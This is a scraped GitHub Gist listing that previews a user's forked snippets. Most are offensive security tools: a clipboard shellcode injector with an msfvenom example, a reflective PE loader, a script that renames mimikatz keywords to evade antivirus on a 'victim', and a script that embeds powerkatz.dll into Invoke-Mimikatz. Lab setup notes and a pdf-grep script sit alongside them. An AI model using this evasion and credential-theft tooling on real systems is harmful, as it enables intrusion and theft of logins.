Skip to content

Instantly share code, notes, and snippets.

@johnjohnsp1
johnjohnsp1 / PowerShellLab_Setup.md
Created Dec 12, 2021 — forked from jdhitsolutions/PowerShellLab_Setup.md
Detailed instructions for setting up the PowerShellLab for my Pluralsight courses.
View PowerShellLab_Setup.md

PowerShell Lab Detailed Setup Instructions

For my Pluralsight PowerShell courses, you are welcome to use any lab environment you wish. It should include an Active Directory domain with at least a domain controller, a Windows 10 client, and a Windows Server 2016 or 2019 member server. You will need to modify the course files to fit your environment. At this point in time, Windows Server 2022 remains untested for my labs.

However, I am going to recommend that you use a free PowerShell module called PSAutoLab. I encourag you to look at the README document on the project's Github repository before proceeding. If you need help with the module or its commands, you will use the repository's Issue section.

PSAutolab

Please refer to this document to assist in installing and setting up the PSAutolab module on your computer. Run all commands from an elevated Windows PowerShell

@johnjohnsp1
johnjohnsp1 / ClippyShellcodeInject.cs
Created Nov 25, 2021 — forked from Wra7h/ClippyShellcodeInject.cs
Clipboard Shellcode Injection
View ClippyShellcodeInject.cs
// Using the clipboard as your code cave.
// Generate your shellcode with msfvenom or whatever
// Example: msfvenom -p windows/x64/exec CMD=calc exitfunc=thread -f raw -o <outputfile.bin>
// Compile: C:\windows\Microsoft.NET\Framework64\v3.5\csc.exe C:\Path\To\ClippyShellcodeInject.cs
using System;
using System.IO;
using System.Runtime.InteropServices;
namespace ClippySCInject
View MDE_DataCollection_Scripts.md

Microsoft Defender for Endpoint does a great job of ensuring the integrity of the scripts they push and execute.

First, they ensure that the script to execute matches the expected file hash. Example:

powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command "& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7910.6064030.0.6552433-3a7d9fb541a03fc183f740777b7bb1aa20a20efd\046a3caf-d9ec-4da6-a32a-fb148992596a.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7910.6064030.0.6552433-3a7d9fb541a03fc183f740777b7bb1aa20a20efd\046a3caf-d9ec-4da6-a32a-fb148992596a.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq 'd871ab44a81b93cdf3c7e235c246ea8b4bf65d9141d7797270c15dd6bbdb2803'))
View ISeeSharpProcess.cs
using System;
using System.Diagnostics;
namespace ISeeSharpProcess
{
class Program
{
// Port of https://gist.github.com/mubix/1536156f06633a54e7f1f819d7fa740a
static void GetCSharpProcess()
{
@johnjohnsp1
johnjohnsp1 / pdf-grep
Created Oct 16, 2020 — forked from ngregoire/pdf-grep
Grep through PDF files
View pdf-grep
#!/bin/bash
# Three arguments: ROOT_DIR, PATTERN, OPTIONS
# Search below $ROOT_DIR for PDF files matching $PATTERN
# $OPTIONS is passed to pdfgrep (ex: grep-pdf . 'some words' -h -C5)
# ROOT_DIR
if [ -z "$1" ]; then
echo "! Argument ROOT_DIR is needed!"
View PsexecReflective.ps1
This file has been truncated, but you can view the full file.
function reflectit
{
<#
.SYNOPSIS
This script has two modes. It can reflectively load a DLL/EXE in to the PowerShell process,
or it can reflectively load a DLL in to a remote process. These modes have different parameters and constraints,
please lead the Notes section (GENERAL NOTES) for information on how to use them.
View mimikatz_obfuscator.sh
# This script downloads and slightly "obfuscates" the mimikatz project.
# Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "benjamin@gentilkiwi.com" ...,
# so removing them from the project before compiling gets us past most of the AV solutions.
# We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ....,
# but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program.
git clone https://github.com/gentilkiwi/mimikatz.git windows
mv windows/mimikatz windows/windows
find windows/ -type f -print0 | xargs -0 sed -i 's/mimikatz/windows/g'
find windows/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/WINDOWS/g'
@johnjohnsp1
johnjohnsp1 / Invoke-UpdateMimikatzScript.ps1
Created Jul 29, 2020 — forked from ihack4falafel/Invoke-UpdateMimikatzScript.ps1
Convert x64/x86 powerkatz.dll to Base64 string and then update Invoke-Mimikatz.ps1 script from Empire
View Invoke-UpdateMimikatzScript.ps1
<#
.Synopsis
Invoke-UpdateMimikatzScript created by Hashim Jawad (@ihack4falafel)
.DESCRIPTION
Convert x64/x86 powerkatz.dll to Base64 string and then update Invoke-Mimikatz.ps1 script from Empire, see the link https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1
.PARAMETER DllPath
Path to powerkatz.dll generated via Visual Studio.
.PARAMETER ScriptPath
Path to Invoke-Mimikatz.ps1 script.
View Wireless Penetration Testing Cheat Sheet.md

#Wireless Penetration Testing Cheat Sheet

##WIRELESS ANTENNA

  • Open the Monitor Mode
root@uceka:~# ifconfig wlan0mon down
root@uceka:~# iwconfig wlan0mon mode monitor
root@uceka:~# ifconfig wlan0mon up